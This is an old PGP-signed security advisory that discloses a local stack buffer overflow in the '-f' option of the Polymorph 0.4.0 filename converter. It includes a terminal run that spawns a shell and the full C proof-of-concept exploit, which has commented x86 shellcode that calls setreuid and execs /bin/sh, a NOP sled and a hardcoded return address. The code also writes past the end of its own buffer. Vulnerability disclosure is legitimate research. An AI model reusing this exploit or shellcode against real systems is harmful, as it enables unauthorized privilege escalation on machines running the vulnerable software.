-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 01100011 - code 'security research team' - ---------------------------------------- - - http://www.c-code.net - - Advisory and PoC exploit by: demz // demz@c-code.net - - Vulnerable source: Polymorph v0.4.0 - - Bug type: Stackoverflow - - Priority: 3 - ---------------------------------------- [01] Description [02] Vulnerable [03] Proof of concept [04] Vendor response [01] Description Polymorph is a filesystem "unixier" (a Win32 -> Unix filename convertor) When downloading images from Usenet alot of filenames are mangled by MS Outlook and other, less caring, newsagents. There could be files with strange names like C:\\PIX\\HUBBLE\\Eagle\ Nebula\ 0532.JPG and this, of course, is unacceptable. Polymorph looks in the current working directory and finds strange filenames like this. It then renames the file after converting all the characters to lowercase and trimming the cruft from the original. The previous example turned out to have the name eagle_nebula_0532.jpg which is much more useful. Polymorph contains an unchecked buffer in the "-f file" option, this can be exploited very simple. [02] Vulnerable Vulnerable and exploitable version, tested on Redhat 8.0: - Polymorph 0.4.0 Maybe also prior versions are vulnerable. Source can be found at: http://chromebob.com/proj/polymorph.html [03] Proof of concept [demz@lab polymorph-0.4.0]$ ./c-polymorph Polymorph 0.4.0 local exploit ---------------------------------------- demz @ c-code.net -- polymorph had trouble converting ?1À1Û1É°FÍ?1ÀPhn/shh//bi?ãPS?á?° Í?1À°Í?????Á% to 1À1Û1É°fÍ?1Àphn/shh//bi?ãps?á?° Í?1À°Í ????? ðóÿ¿... the file is now possibly corrupt sh-2.05b$ A proof of concept exploit can be found at: http://www.c-code.net/Releases/Exploits/c-polymorph.c [04] Vendor response The vendor is informed. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+zTzZ8ToiGqnwMzARAphBAJ9L+MOY5R5arOeb1slTXeNgYAgwsgCcD8od IwAUN0zzl8ZhkfZN5judNNY= =oc09 -----END PGP SIGNATURE-----
/* c-polymorph.c * * PoC exploit made for advisory based uppon an local stack based overflow. * Vulnerable versions, maybe also prior versions: * * Polymorph v0.4.0 * * Tested on: Redhat 8.0 * * Advisory source: c-code.net (security research team) * http://www.c-code.net/Releases/Advisories/c-code-adv001.txt * * --------------------------------------------- * coded by: demz (c-code.net) (demz@c-code.net) * --------------------------------------------- * */ #include <stdio.h> char shellcode[]= "\x31\xc0" // xor eax, eax "\x31\xdb" // xor ebx, ebx "\x31\xc9" // xor ecx, ecx "\xb0\x46" // mov al, 70 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\x50" // push eax "\x68\x6e\x2f\x73\x68" // push long 0x68732f6e "\x68\x2f\x2f\x62\x69" // push long 0x69622f2f "\x89\xe3" // mov ebx, esp "\x50" // push eax "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x99" // cdq "\xb0\x0b" // mov al, 11 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\xb0\x01" // mov al, 1 "\xcd\x80"; // int 0x80 int main() { unsigned long ret = 0xbffff3f0; char buffer[2076]; int i=0; memset(buffer, 0x90, sizeof(buffer)); for (0; i < strlen(shellcode) - 1;i++) buffer[1000 + i] = shellcode[i]; buffer[2076] = (ret & 0x000000ff); buffer[2077] = (ret & 0x0000ff00) >> 8; buffer[2078] = (ret & 0x00ff0000) >> 16; buffer[2079] = (ret & 0xff000000) >> 24; buffer[2080] = 0x0; printf("\nPolymorph v0.4.0 local exploit\n"); printf("---------------------------------------- demz @ c-code.net --\n"); execl("./polymorph", "polymorph", "-f", buffer, NULL); }
